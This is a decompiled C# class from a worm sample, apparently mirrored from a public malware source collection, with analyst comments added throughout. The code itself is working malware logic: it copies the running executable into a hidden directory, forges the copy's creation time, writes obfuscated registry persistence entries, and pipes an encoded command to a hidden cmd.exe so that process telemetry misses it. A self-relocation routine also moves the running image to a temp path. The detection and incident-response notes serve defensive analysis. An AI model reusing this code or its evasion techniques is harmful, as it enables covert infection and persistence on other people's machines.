mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 21:35:27 +00:00
// Decompiled with JetBrains decompiler
|
|||
|
// Type: Ҧ߲๒ʽ໙ୄᴘ.ɱªᕢ᳭ᬻ˫ԧᵢ
|
|||
|
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
|
|||
|
|
|||
|
using Microsoft.Win32;
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
|
|||
|
namespace Ҧ߲๒ʽ໙ୄᴘ
|
|||
|
{
|
|||
|
internal class ɱªᕢ᳭ᬻ\u02EBԧᵢ
|
|||
|
{
|
|||
|
/// <summary>
/// Installation entry point of this decompiled sample. Runs three steps in a
/// fixed order: drop a copy of the executable, feed a command to a hidden
/// cmd.exe, then write registry values that reference the dropped copy.
/// </summary>
/// <remarks>
/// Triage: the file-system and registry side effects of the three callees are
/// the artefacts to look for on a suspected host; each callee swallows its own
/// exceptions, so a partial install is possible.
/// </remarks>
public static void ᅰ()
|
|||
|
{
|
|||
|
// Step 1: copy the running image into the configured drop directory
// (optionally forging its creation time and setting Hidden attributes).
ɱªᕢ᳭ᬻ\u02EBԧᵢ.P();
|
|||
|
// Step 2: write an encoded command line to the stdin of a windowless cmd.exe.
ɱªᕢ᳭ᬻ\u02EBԧᵢ.ᯁព();
|
|||
|
// Step 3: create registry values whose data is the path of the dropped copy.
ɱªᕢ᳭ᬻ\u02EBԧᵢ.ᶏපϔẞ();
|
|||
|
}
|
|||
|
|
|||
|
/// <summary>
/// Drops a copy of the running executable into the directory named by a config
/// field, then (depending on config flags) forges the copy's creation time and
/// sets Hidden | NotContentIndexed on the directory and on a file inside it.
/// </summary>
/// <remarks>
/// Every step sits in its own try block with an empty catch, so a failure in
/// one step neither stops the later steps nor leaves an error trace.
/// The directory and file names come from config fields defined elsewhere; the
/// file name is passed through a helper that appears to be a string decoder
/// (NOTE(review): confirm against the helper's definition).
/// </remarks>
private static void P()
|
|||
|
{
|
|||
|
// Create the drop directory if it does not exist yet.
try
|
|||
|
{
|
|||
|
if (!Directory.Exists(ȩזြڹᡡỾỔው.ౡ\u000F))
|
|||
|
Directory.CreateDirectory(ȩזြڹᡡỾỔው.ౡ\u000F);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
// Copy the current process image to <drop dir>\<helper-derived name>; the
// final 'true' overwrites an existing file of the same name.
try
|
|||
|
{
|
|||
|
File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(ȩזြڹᡡỾỔው.ౡ\u000F, \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)), true);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
// Optional creation-time forgery (timestomping), gated by a config flag.
// Forensic indicator: Random.Next's upper bound is exclusive, so the forged
// date always has day 1-27, month 1-11 and a year from 2000 up to last year,
// and new DateTime(y, m, d) carries a time of exactly 00:00:00. Only the
// creation time is set here; the other timestamps are not touched by this
// method, so a creation time older than them is worth flagging.
try
|
|||
|
{
|
|||
|
if (ȩזြڹᡡỾỔው.\u09C7)
|
|||
|
{
|
|||
|
Random random = new Random();
|
|||
|
int day = random.Next(1, 28);
|
|||
|
int month = random.Next(1, 12);
|
|||
|
int year = random.Next(2000, DateTime.Now.Year);
|
|||
|
// The path built here is the copied file, although the Directory API is used.
Directory.SetCreationTime(Path.Combine(ȩזြڹᡡỾỔው.ౡ\u000F, \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)), new DateTime(year, month, day));
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
// Optional: mark the drop directory Hidden and excluded from content indexing.
// Listings that include hidden items (e.g. "dir /a") still show it.
if (ȩזြڹᡡỾỔው.όᘂ\u1CCCᥓ\u005B)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
File.SetAttributes(ȩזြڹᡡỾỔው.ౡ\u000F, FileAttributes.Hidden | FileAttributes.NotContentIndexed);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
// Stop here unless the per-file hide flag is set.
if (!ȩזြڹᡡỾỔው.\u0B6E೮ᔙᩢ᷵ጔổ)
|
|||
|
return;
|
|||
|
// Same attributes on a file inside the drop directory.
// NOTE(review): this path is built with a different helper method than the
// File.Copy above; whether it resolves to the same file name cannot be
// confirmed from this file.
try
|
|||
|
{
|
|||
|
File.SetAttributes(Path.Combine(ȩזြڹᡡỾỔው.ౡ\u000F, \u1928ᔾዔ.յ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)), FileAttributes.Hidden | FileAttributes.NotContentIndexed);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
/// <summary>
/// Registry persistence step. Depending on three config flags it writes up to
/// three registry entries whose data is "<drop dir>\<file name>", i.e. the
/// path of the copy created by the drop step.
/// </summary>
/// <remarks>
/// The key paths are encoded string literals passed through a helper that
/// appears to be a string decoder; their clear-text values are not visible in
/// this file. NOTE(review): presumably autostart locations - confirm by
/// decoding in an isolated analysis environment.
/// Each write is in its own try block with an empty catch, so a denied HKLM
/// write (non-elevated process) fails silently while the HKCU write can still
/// succeed.
/// </remarks>
public static void ᶏපϔẞ()
|
|||
|
{
|
|||
|
// Entry 1 (flag-gated): value under HKEY_CURRENT_USER; needs no elevation.
try
|
|||
|
{
|
|||
|
if (ȩזြڹᡡỾỔው.\u1C42\u193Eᙁᖔᠮ೬\u1BFB)
|
|||
|
Registry.CurrentUser.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true)).SetValue(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u1B65ᬧౢzƎ, true), (object) (ȩזြڹᡡỾỔው.ౡ\u000F + "\\" + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
// Entry 2 (flag-gated): same encoded key path and the same value-name field,
// written under HKEY_LOCAL_MACHINE.
try
|
|||
|
{
|
|||
|
if (ȩזြڹᡡỾỔው.கພ༢ਊȷඣᯇᝨ)
|
|||
|
Registry.LocalMachine.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true)).SetValue(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u1B65ᬧౢzƎ, true), (object) (ȩזြڹᡡỾỔው.ౡ\u000F + "\\" + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
// Entry 3 (flag-gated): a second HKLM key built from an encoded prefix plus an
// encoded config suffix. The method returns early when the flag is off.
try
|
|||
|
{
|
|||
|
if (!ȩזြڹᡡỾỔው.ԑᅤᴨᡰ\u02EFᣢỳ)
|
|||
|
return;
|
|||
|
RegistryKey subKey = Registry.LocalMachine.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FhIJFxoEFQgfECwmNTI2Mik3HwQmNyw5KOPDvpzrFig3ODMfDDE2NyQvLygn4wYyMDMyMSgxNzYf", true) + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.ụү᳗, true));
|
|||
|
// Detection note: unlike the calls above, the two value names below are passed
// to SetValue as raw literals, without going through the decoder helper. As
// written, the registry would therefore contain values named exactly
// "Fjc4JcO+nOsTJDcr" (data: path of the dropped copy) and
// "BjAGKzC99eEAMR4pKSIh" (DWORD 1) under this key.
// NOTE(review): may be a decompilation artefact - confirm on a detonated sample.
subKey.SetValue("Fjc4JcO+nOsTJDcr", (object) (ȩזြڹᡡỾỔው.ౡ\u000F + "\\" + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)));
|
|||
|
subKey.SetValue("BjAGKzC99eEAMR4pKSIh", (object) 1, RegistryValueKind.DWord);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
/// <summary>
/// Starts cmd.exe with no window and a redirected standard input, writes two
/// lines to it (a "cd" into the drop directory and one formatted command),
/// closes the input stream and then kills the process.
/// </summary>
/// <remarks>
/// The command template is an encoded literal whose clear text is not visible
/// in this file; it is formatted with the helper-derived file name.
/// Detection note: the commands are delivered over stdin, so they do not appear
/// in the command-line field of process-creation telemetry for this cmd.exe.
/// What is observable is a bare, windowless cmd.exe child of the sample that
/// is terminated almost immediately, plus whatever side effects the command
/// has. Any exception is swallowed by the empty catch.
/// </remarks>
private static void ᯁព()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
Process process = new Process();
|
|||
|
// UseShellExecute = false is required for stdin redirection; CreateNoWindow
// keeps the console invisible to the logged-on user.
process.StartInfo = new ProcessStartInfo()
|
|||
|
{
|
|||
|
FileName = "cmd.exe",
|
|||
|
UseShellExecute = false,
|
|||
|
RedirectStandardInput = true,
|
|||
|
CreateNoWindow = true,
|
|||
|
WindowStyle = ProcessWindowStyle.Hidden
|
|||
|
};
|
|||
|
process.Start();
|
|||
|
StreamWriter standardInput = process.StandardInput;
|
|||
|
// Line 1: change into the drop directory (path is concatenated unquoted).
standardInput.WriteLine("cd " + ȩזြڹᡡỾỔው.ౡ\u000F);
|
|||
|
// Line 2: encoded template with {0} filled by the helper-derived file name.
standardInput.WriteLine(string.Format(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("KCYrMuMePTIxKBc1JDE2KSg1IB0yMSgMB8O+nOvjAOP14wHjPvNA/R0SEQjxLCcoMTcsKSwoNQ==", true), (object) \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)));
|
|||
|
standardInput.Close();
|
|||
|
// Kill follows Close with no wait in between.
// NOTE(review): whether the shell always gets to run both lines before it is
// terminated cannot be determined from this file.
process.Kill();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
/// <summary>
/// Removal routine: deletes registry values and keys derived from the same
/// encoded literals and config fields the registry-install method uses, then
/// calls the self-relocation method that moves the running executable away.
/// </summary>
/// <remarks>
/// Incident-response notes:
/// - Each deletion has its own empty catch, so remnants stay behind silently
///   when a deletion fails (for example HKLM access without elevation).
/// - The keys are opened with CreateSubKey, which creates the key when it does
///   not exist; an empty key can therefore remain as a trace.
/// - The HKLM value deleted here is named by a different config field than the
///   one the install method uses for its HKLM write; unless both fields hold
///   the same name, the installed HKLM value is not removed.
/// - The two raw-literal values written by the install method are only removed
///   indirectly, through deletion of their containing key.
/// </remarks>
public static void \u171D\u0018ẖေᒷᐦᵨỨ()
|
|||
|
{
|
|||
|
// Remove the HKCU value (same key literal and name field as the install write).
try
|
|||
|
{
|
|||
|
Registry.CurrentUser.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true)).DeleteValue(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u1B65ᬧౢzƎ, true));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
// Remove an HKLM value under the same key literal; note the different name field.
try
|
|||
|
{
|
|||
|
Registry.LocalMachine.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true)).DeleteValue(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u02DBˬଋธ, true));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
// Delete the second HKLM key (encoded prefix + encoded config suffix).
// DeleteSubKey throws if the key still has child subkeys; that is swallowed.
try
|
|||
|
{
|
|||
|
Registry.LocalMachine.DeleteSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FhIJFxoEFQgfECwmNTI2Mik3HwQmNyw5KOPDvpzrFig3ODMfDDE2NyQvLygn4wYyMDMyMSgxNzYf", true) + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.ụү᳗, true));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
// Delete one more key whose hive and (unencoded) path both come from config.
// Only CurrentUser and LocalMachine are handled; other hives are ignored.
// NOTE(review): this key is not written anywhere in this file - its purpose
// must be confirmed from the rest of the sample.
try
|
|||
|
{
|
|||
|
switch (ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ)
|
|||
|
{
|
|||
|
case RegistryHive.CurrentUser:
|
|||
|
Registry.CurrentUser.DeleteSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ);
|
|||
|
break;
|
|||
|
case RegistryHive.LocalMachine:
|
|||
|
Registry.LocalMachine.DeleteSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ);
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
// Finally relocate the running executable (see the method called here).
ɱªᕢ᳭ᬻ\u02EBԧᵢ.\u0AFD();
|
|||
|
}
|
|||
|
|
|||
|
/// <summary>
/// Moves the running executable to a freshly generated temp-file path and
/// passes that path to a helper defined outside this file.
/// </summary>
/// <remarks>
/// Incident-response note: after this runs, the sample's image is no longer at
/// its original location but under the temp-file name returned by
/// Path.GetTempFileName, so a search limited to the original path misses it.
/// NOTE(review): the helper's (path, null, flag) argument shape suggests a
/// follow-up file operation on the moved image, but its behaviour cannot be
/// confirmed from this file.
/// Any exception is caught and discarded.
/// </remarks>
public static void \u0AFD()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
// GetTempFileName creates an empty placeholder file; it is deleted so the
// name is free to be used as the destination of the move.
string tempFileName = Path.GetTempFileName();
|
|||
|
File.Delete(tempFileName);
|
|||
|
// Relocate the image of the current process to the temp path.
File.Move(Process.GetCurrentProcess().MainModule.FileName, tempFileName);
|
|||
|
// External helper; second argument is null, third is a member of an enum
// nested in the helper's class.
\u0667Ѹ.\u1936\u0A50Ȁ\u0A84ᠬ\u1AE7(tempFileName, (string) null, \u0667Ѹ.ቩᩬᐜ̯ṅडၿ.ᑹ\u17FCנᒞ͍ሴǒ);
|
|||
|
}
|
|||
|
// The exception variable is never read: failures are silently ignored.
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
/// <summary>
/// Nested enum with three obfuscated members and no explicit values, so the
/// members take the implicit values 0, 1 and 2 in declaration order.
/// </summary>
/// <remarks>
/// No use of this enum is visible in this file.
/// NOTE(review): its meaning has to be recovered from call sites elsewhere in
/// the assembly.
/// </remarks>
public enum \u0EF7ᶟᔂᢪĉᤘᢁַắ
|
|||
|
{
|
|||
|
የ᠖\u0E6Cᬰᥥ,
|
|||
|
ฏᆈǸ᱙Ȏ\u1CFD༾,
|
|||
|
\u05AFᩚၡ\u00F7ᩯ\u1B4Cጝ,
|
|||
|
}
|
|||
|
}
|
|||
|
}
|